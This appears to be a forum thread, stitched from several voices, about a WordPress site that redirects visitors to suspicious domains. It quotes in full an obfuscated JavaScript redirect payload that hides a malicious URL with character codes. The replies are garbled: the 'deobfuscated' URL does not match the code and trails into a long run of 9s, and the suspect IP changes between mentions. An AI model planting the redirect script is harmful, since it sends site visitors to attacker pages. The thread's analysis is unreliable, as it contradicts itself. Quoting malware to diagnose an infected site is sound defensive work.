The webpage reside on WP. Upon attempt to access, an initial redirect occurs to

/tricfk.traindresistor.co/

then to

/fingerprintopduch.best/go/

and a snippet of code emerge:

window.stop(); function _0x4165(_0x1c7833,_0x312763){var _0x384719=_0x3847();return _0x4165=function(_0x4165ff,_0x4cb21c){_0x4165ff=_0x4165ff-0x185;var _0x3edf04=_0x 384719[_0x4165ff];return _0x3edf04;},_0x4165(_0x1c7833,_0x312763);}var _0x2ca8a2=_0x4165;(function(_0x538cc7,_0x2ae31a){var _0x173fc3=_0x4165,_0x5b6817=_0x538cc7();while(!![]){try{var _0x1b9268=parseInt(_0x173fc3(0x18e))/0x1+parseInt(_0x173fc3(0x191))/0x2*(parseInt(_0x 173fc3(0x18d))/0x3)+parseInt(_0x173fc3(0x18f))/0x4+-parseInt(_0x173fc3(0x189))/0x5*(-parseInt(_0x 173fc3(0x18c))/0x6)+-parseInt(_0x173fc3(0x186))/0x7+-parseInt(_0x173fc3(0x187))/0x8*(parseInt(_0x173fc3(0x18a))/0x9)+parseInt(_0x173fc3(0x18b))/0xa;if(_0x1b9268===_0x2ae31a)break;else _0x5b6817'push';}catch(_0x1fc706){_0x5b6817'push';}}}(_0x3847,0xe77a1));var ll=0x2ca8a2(0x190);document[ 0x2ca8a2(0x188)][_0x2ca8a2(0x185)]=ll,window[_0x2ca8a2(0x188)]_0x2ca8a2(0x192);function _0x3847(){var _0x786271=['688400bYXEDO','replace','href','5956636QUrnAb','47696JxEbld','location','296330XygErO','2358VtSkab','19357140uMcgeD','18tMFlRH',' 3cAvVrX','231172tCDMyi','2688948VEEIEX',String.fromCharCode(104,116,116,112,115,58,47,47 ,116,114,105,99,107,46,116,114,97,105,110,114,101,115,105,115,116,111,114,46,99,99,47,97,46,112,104,112,63,115,105,100,61 ,49,49,49,49,49,49,38,117,116,109,95,115,111,117,114,99,101,61,55,53,52,56,52,53)];_0x3847=function(){return _0x786271;};return _0x3847();}
What might be causin' this? Virus?

Aibolit check didn't show anythin'. But Eset 32 complains when openin' a website."

When you try to access your site, you're gettin' redirected to a couple of weird URLs:

/tricfk.traindresistor.co/
/fingerprintopduch.best/go/
Now, I don't know about you, but those don't look like any legitimate URLs for a WordPress site. It's like someone's tryin' to send you on a wild goose chase. And then, to top it all off, you're seein' some mysterious code snippet pop up on your screen. That's not the kind of welcome mat I like to see when I visit a website.

Now, let's talk about that code snippet. It's a bit of obfuscated JavaScript, which is just a fancy way of sayin' it's been deliberately made hard to read. The folks who wrote it are tryin' to hide what it does, which is usually a big red flag that somethin' sneaky is goin' on. But don't you worry, I've got my trusty deobfuscator handy, and let's see what we can make of this mess.

After runnin' the code through the deobfuscator, we can see that it's tryin' to change the location.href property of the window object. In other words, it's tryin' to redirect you to a new URL. And wouldn't you know it, that new URL is `hxxp://185.244.125[.]130/999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999'

Hey there, folks. Same old story. Those sneaky scammers found a way to infiltrate mySQL and altered the siteurl entry in the wp_options table to point to their shady left link. And wouldn't ya know it, the redirects are already up and running for 'em. Yep, I'm using that PublishPress Capabilities plugin, too (one of 'em listed up there). Maybe there's a real vulnerability there, who knows?

When you got a specific date and time in mind, go ahead and open up that access.log file to see whats was goin on with that suspicious IP adress 159.242.228.170 at that exect moment. May be it was sendin a POST request to some shady xmlrpc.php or maybe somethin else entirly, like a malicius file hidin on your site (could be the backdoor you been lookin for).

Or maybe, just maybe, the file itself wasnt the problem, but somethin was injected into it, like a sneaky piece of code, often with a bunch of spaces so it didnt stand out like a sore thumb... theres alot of posibillities here. Basicly, I was sugesting you take a gander at the logs, do some diggin, and find the root of the problem... for free, no less! But hey, if you dont wanna bother, then dont, just go ahead and look for all the requests from that 159.242.248.170 IP adress for starters, see whats shakin.